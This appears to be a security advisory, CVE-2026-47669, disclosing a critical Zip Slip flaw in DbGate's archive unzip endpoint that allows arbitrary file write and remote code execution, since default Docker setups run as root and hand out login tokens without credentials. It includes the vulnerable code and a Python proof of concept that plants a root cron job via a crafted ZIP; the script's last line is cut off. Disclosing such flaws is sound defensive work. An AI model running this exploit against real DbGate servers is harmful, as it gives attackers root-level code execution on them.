CVE-2026-47669
published 2026-06-05
critical
DbGate: Zip Slip in archive/unzip allows arbitrary file write leading to RCE
The `unzipDirectory()` function in `packages/api/src/shell/unzipDirectory.js` (line 27) does not validate that extracted file paths stay within the output directory. A malicious ZIP with `../` entries writes files anywhere on the filesystem.
In the default Docker deployment, DbGate runs as root and the `none` auth provider issues JWT tokens without credentials via `POST /auth/login`, so this is exploitable by any network-adjacent attacker.
**Affected code:**
`packages/api/src/shell/unzipDirectory.js`, line 27:
```js
const destPath = path.join(outputDirectory, entry.fileName);
// No check that destPath stays within outputDirectory
```
Called from `packages/api/src/controllers/archive.js`, lines 291-293:
```js
async unzip({ folder }) {
  const newFolder = await this.getNewArchiveFolder({ database: folder.slice(0, -4) });
  await unzipDirectory(path.join(archivedir(), folder), path.join(archivedir(), newFolder));
}
```
The archive controller also performs no permission checks and no path-traversal validation on any of its endpoints.
**PoC:**
```python
import requests, zipfile, io
TARGET = "http://localhost:3000"
# Get auth token (no credentials needed in default Docker)
r = requests.post(f"{TARGET}/api/auth/login", json={"amoid": "none"})
token = r.json()["accessToken"]
hdrs = {"Authorization": f"Bearer {token}"}
# Create malicious ZIP with path traversal
buf = io.BytesIO()
with zipfile.ZipFile(buf, 'w') as zf:
    zf.writestr("../../../../../../etc/cron.d/dbgate-pwn",
                "* * * * * root id > /tmp/pwned\n")
buf.seek(0)
# Upload ZIP
r = requests.post(f"{TARGET}/api/uploads/upload", headers=hdrs,
                  files={"data": ("evil.zip", buf, "application/zip")})
info = r.json()
# Save to archive
requests.post(f"{TARGET}/api/archive/save-uploaded-zip", headers=hdrs,
              json={"filePath": info["filePath"], "fileName": "evil.zip"})
# Trigger Zip Slip - writes cron job to /etc/cron.d/
requests.post(f"{TARGET}/api/ar
```
**Affected (1 range):**
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| dbgate | dbgate | >= 0 < 7.1.9 | 7.1.9 |